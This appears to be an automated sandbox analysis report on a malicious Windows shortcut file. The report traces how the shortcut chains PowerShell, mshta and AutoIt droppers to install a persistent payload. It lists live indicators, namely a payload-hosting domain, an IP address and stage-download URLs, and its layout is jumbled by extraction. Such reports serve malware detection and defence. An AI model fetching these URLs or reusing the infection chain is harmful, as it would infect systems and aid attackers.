Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		NTDS37
System Information Discovery		Distributed Component Object Model3
Clipboard Data		23
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		231
Masquerading		LSA Secrets151
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		2
Valid Accounts		Cached Domain Credentials31
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
Virtualization/Sandbox Evasion		DCSync13
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577872 Sample: s4PymYGgSh.lnk Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 87 tiffany-careers.com 2->87 89 x1.i.lencr.org 2->89 91 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->91 97 Malicious sample detected (through community Yara rule) 2->97 99 Windows shortcut file (LNK) starts blacklisted processes 2->99 101 Sigma detected: Drops script at startup location 2->101 103 12 other signatures 2->103 14 forfiles.exe 1 2->14         started        17 wscript.exe 2->17         started        19 svchost.exe 1 1 2->19         started        signatures3 process4 dnsIp5 125 Windows shortcut file (LNK) starts blacklisted processes 14->125 22 powershell.exe 7 14->22         started        25 conhost.exe 1 14->25         started        127 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->127 27 SwiftWrite.pif 17->27         started        93 127.0.0.1 unknown unknown 19->93 signatures6 process7 signatures8 107 Windows shortcut file (LNK) starts blacklisted processes 22->107 109 Drops PE files to the user root directory 22->109 111 Powershell drops PE file 22->111 29 mshta.exe 16 22->29         started        process9 dnsIp10 95 tiffany-careers.com 147.45.49.155, 443, 49716, 49742 FREE-NET-ASFREEnetEU Russian Federation 29->95 79 C:\Users\user\AppData\Local\...\duydemo[1], PE32 29->79 dropped 129 Windows shortcut file (LNK) starts blacklisted processes 29->129 131 Suspicious powershell command line found 29->131 34 powershell.exe 17 18 29->34         started        file11 signatures12 process13 file14 71 C:\Users\user\AppData\Roaming\BFmcYQ.exe, PE32+ 34->71 dropped 105 Binary is likely a compiled AutoIt script file 34->105 38 BFmcYQ.exe 34->38         started        42 Acrobat.exe 81 34->42         started        44 conhost.exe 34->44         started        signatures15 process16 file17 73 C:\Users\Public\PublicProfile.ps1, ASCII 38->73 dropped 113 Windows shortcut file (LNK) starts blacklisted processes 38->113 115 Multi AV Scanner detection for dropped file 38->115 117 Suspicious powershell command line found 38->117 119 2 other signatures 38->119 46 powershell.exe 38->46         started        49 powershell.exe 38->49         started        52 AcroCEF.exe 108 42->52         started        signatures18 process19 dnsIp20 81 C:\Users\Public\Secure.au3, Unicode 46->81 dropped 54 Guard.exe 46->54         started        58 conhost.exe 46->58         started        85 139.99.188.124, 49766, 49795, 80 OVHFR Canada 49->85 83 C:\Users\Publicbehaviorgraphuard.exe, PE32 49->83 dropped 60 conhost.exe 49->60         started        62 AcroCEF.exe 52->62         started        file21 process22 file23 75 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 54->75 dropped 77 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 54->77 dropped 121 Windows shortcut file (LNK) starts blacklisted processes 54->121 123 Drops PE files with a suspicious file extension 54->123 64 cmd.exe 54->64         started        signatures24 process25 file26 69 C:\Users\user\AppData\...\SwiftWrite.url, MS 64->69 dropped 67 conhost.exe 64->67         started        process27

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
C:\Users\user\AppData\Roaming\BFmcYQ.exe33%ReversingLabsWin64.Downloader.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://tiffany-careers.com/test.pdf0%Avira URL Cloudsafe
http://139.99.188.124/hvshp0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemoLMEMH0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemo0%Avira URL Cloudsafe
http://tiffany-careers.com/BFmcYQ.exep0%Avira URL Cloudsafe
https://tiffany-careers.com/0%Avira URL Cloudsafe
http://crl.microsoftSb0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemo60%Avira URL Cloudsafe
https://tiffany-careers.com/duydemos0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemo(0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemo$global:?0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemo...6f-0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemo=C:0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemohttps://tiffany-careers.com/duydemoP&0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemorDataFPS_BROW0%Avira URL Cloudsafe
http://139.99.188.1240%Avira URL Cloudsafe
https://tiffany-careers.com/duydemo...0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemoT0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemoOC:0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemoH0%Avira URL Cloudsafe
http://139.99.188.124/EsgMle.txt0%Avira URL Cloudsafe
http://139.99.H0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemoC:0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemoTTC:0%Avira URL Cloudsafe
http://tiffany-careers.com0%Avira URL Cloudsafe
https://tiffany-careers.com/duydemoy.0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    		high
    tiffany-careers.com
    		147.45.49.155
    		truetrue
      		unknown
      x1.i.lencr.org
      		unknown
      		unknownfalse
        		high
        nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://tiffany-careers.com/test.pdffalse
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.com/duydemotrue
          • Avira URL Cloud: safe
          		unknown
          http://139.99.188.124/hvshptrue
          • Avira URL Cloud: safe
          		unknown
          http://139.99.188.124/EsgMle.txttrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://tiffany-careers.com/BFmcYQ.exeppowershell.exe, 00000007.00000002.1580236263.000001EE0B14C000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://www.autoitscript.com/autoit3/JGuard.exe, 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp, Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000001B.00000000.1906525938.0000000000FD9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.21.drfalse
            		high
            http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1656137707.000001EE1AD23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1958024170.0000026D2DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://tiffany-careers.com/duydemosforfiles.exe, 00000001.00000002.1425075310.000002138F050000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://go.micropowershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.microsoftSbpowershell.exe, 00000007.00000002.1579505691.000001EE08EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://tiffany-careers.com/duydemo6mshta.exe, 00000004.00000003.1712666267.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719158237.000002C2C9706000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://tiffany-careers.com/mshta.exe, 00000004.00000002.1720378439.000002C2C9727000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000006.00000003.1459048299.000001F09CE20000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://tiffany-careers.com/duydemoLMEMHmshta.exe, 00000004.00000002.1722445350.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1713934465.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1718694707.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707699079.000002CAD110C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.ver)svchost.exe, 00000006.00000002.2648871899.000001F09D000000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://tiffany-careers.com/duydemo(mshta.exe, 00000004.00000002.1720205702.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719416835.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://tiffany-careers.com/duydemo...6f-mshta.exe, 00000004.00000002.1720950548.000002CACB930000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.autoitscript.com/autoit3/Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drfalse
                                		high
                                https://tiffany-careers.com/duydemo=C:forfiles.exe, 00000001.00000002.1425154635.000002138F260000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://tiffany-careers.com/duydemo$global:?powershell.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://tiffany-careers.com/duydemohttps://tiffany-careers.com/duydemoP&mshta.exe, 00000004.00000003.1716370101.000002CACF945000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://tiffany-careers.com/duydemorDataFPS_BROWmshta.exe, 00000004.00000002.1720006678.000002C2C9680000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000006.00000003.1459048299.000001F09CE79000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://tiffany-careers.com/duydemo...mshta.exe, 00000004.00000002.1720950548.000002CACB946000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://139.99.188.124powershell.exe, 00000013.00000002.1778186746.0000026D1E158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tiffany-careers.com/duydemoTmshta.exe, 00000004.00000002.1720205702.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719416835.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tiffany-careers.com/duydemoOC:s4PymYGgSh.lnkfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1656137707.000001EE1AD23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1958024170.0000026D2DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://oneget.orgXpowershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://aka.ms/pscore68powershell.exe, 00000007.00000002.1580236263.000001EE0ACB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1DF31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://tiffany-careers.com/duydemoHmshta.exe, 00000004.00000002.1720650071.000002C2CAF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://139.99.Hpowershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://tiffany-careers.com/duydemoC:forfiles.exe, 00000001.00000002.1425075310.000002138F050000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707086050.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720495666.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715474320.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719251921.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720148189.000002C2C9690000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1580236263.000001EE0ACB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1DF31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tiffany-careers.compowershell.exe, 00000007.00000002.1580236263.000001EE0AEDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://tiffany-careers.com/duydemoTTC:mshta.exe, 00000004.00000003.1712666267.000002C2C96CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://tiffany-careers.com/duydemoy.mshta.exe, 00000004.00000003.1712666267.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719158237.000002C2C9706000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://oneget.orgpowershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                139.99.188.124
                                                		unknownCanada
                                                		16276OVHFRtrue
                                                147.45.49.155
                                                		tiffany-careers.comRussian Federation
                                                		2895FREE-NET-ASFREEnetEUtrue

                                                Private

                                                IP
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1577872
                                                Start date and time:2024-12-18 20:54:11 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 10m 12s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:29
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:s4PymYGgSh.lnk
                                                renamed because original name is a hash value
                                                Original Sample Name:f2d11d2f41fe0c5b667ddc0cdde9b149.lnk
                                                Detection:MAL
                                                Classification:mal100.expl.evad.winLNK@41/73@8/3
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 96
                                                • Number of non-executed functions: 278
                                                Cookbook Comments:
                                                • Found application associated with file extension: .lnk

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.193.114.26, 23.193.114.18, 172.64.41.3, 162.159.61.3, 23.218.208.137, 34.237.241.83, 54.224.241.105, 18.213.11.84, 50.16.47.176, 2.20.77.60, 2.20.68.228, 2.20.68.207, 13.107.246.63, 4.245.163.56, 52.6.155.20, 23.217.172.185
                                                • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
                                                • Execution Graph export aborted for target mshta.exe, PID 7892 because there are no executed function
                                                • Execution Graph export aborted for target powershell.exe, PID 7396 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 8128 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: s4PymYGgSh.lnk

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                14:55:25API Interceptor2x Sleep call for process: svchost.exe modified
                                                14:55:26API Interceptor1x Sleep call for process: mshta.exe modified
                                                14:55:29API Interceptor95x Sleep call for process: powershell.exe modified
                                                14:55:46API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                14:56:31API Interceptor1395x Sleep call for process: Guard.exe modified
                                                14:56:57API Interceptor84x Sleep call for process: SwiftWrite.pif modified
                                                20:55:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                139.99.188.124EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/ucZfzm.txt
                                                RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/mzmLv.txt
                                                S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/wPBPjuY.txt
                                                PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/BlQMSgJx.txt
                                                l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/jiJNz.txt
                                                duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/QWCheljD.txt
                                                pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/QWCheljD.txt
                                                FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/EPDjSfs.txt
                                                147.45.49.155duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                • tiffany-careers.com/PefjSkkhb.exe

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                s-part-0035.t-0009.t-msedge.nethttp://mee6.xyzGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                http://johnlewisfinance.qa.uinsure.co.ukGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                Configurator.exeGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.246.63
                                                https://www.google.com/url?q=https%3A%2F%2Fjollybos.es%2Fwills&sa=D&sntz=1&usg=AOvVaw1qWh2KPHS1VH9DwguQzCFrGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.246.63
                                                1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                • 13.107.246.63
                                                7KAYnROp5y.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 13.107.246.63
                                                xul_patched.dllGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                • 13.107.246.63
                                                xul_patched.dllGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                tiffany-careers.comduyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                • 147.45.49.155

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                FREE-NET-ASFREEnetEUboatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.124.54
                                                duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                • 147.45.49.155
                                                OVHFRhttps://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                • 51.68.39.188
                                                la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                • 176.31.190.89
                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                • 51.195.114.88
                                                la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                • 139.99.189.235
                                                https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/vvr/#phg4Plg4Ppjx3vandLh6rWPyLh6rwLh6q07qvz9Bjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                • 167.114.27.228
                                                http://bluepeak-group.com/fcGet hashmaliciousUnknownBrowse
                                                • 54.38.113.2
                                                yoyf.exeGet hashmaliciousUnknownBrowse
                                                • 91.134.10.127
                                                yoyf.exeGet hashmaliciousUnknownBrowse
                                                • 91.134.10.182
                                                Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                • 51.89.44.68
                                                gaozw40v.exeGet hashmaliciousXmrigBrowse
                                                • 54.37.137.114

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19solara-executor.exeGet hashmaliciousUnknownBrowse
                                                • 147.45.49.155
                                                List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                • 147.45.49.155
                                                g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                • 147.45.49.155
                                                solara-executor.exeGet hashmaliciousUnknownBrowse
                                                • 147.45.49.155
                                                Setup.msiGet hashmaliciousUnknownBrowse
                                                • 147.45.49.155
                                                InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                • 147.45.49.155
                                                T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                • 147.45.49.155
                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 147.45.49.155
                                                z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                • 147.45.49.155

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\Public\Guard.exePkContent.exeGet hashmaliciousUnknownBrowse
                                                  PkContent.exeGet hashmaliciousUnknownBrowse
                                                    ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                      ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                        EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                          RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                            S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                                              PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                                                l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                                                  duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                    C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifPkContent.exeGet hashmaliciousUnknownBrowse
                                                                      PkContent.exeGet hashmaliciousUnknownBrowse
                                                                        ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                          ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                            EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                                              RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                                                S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                                                                  PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                                                                    l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                                                                      duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
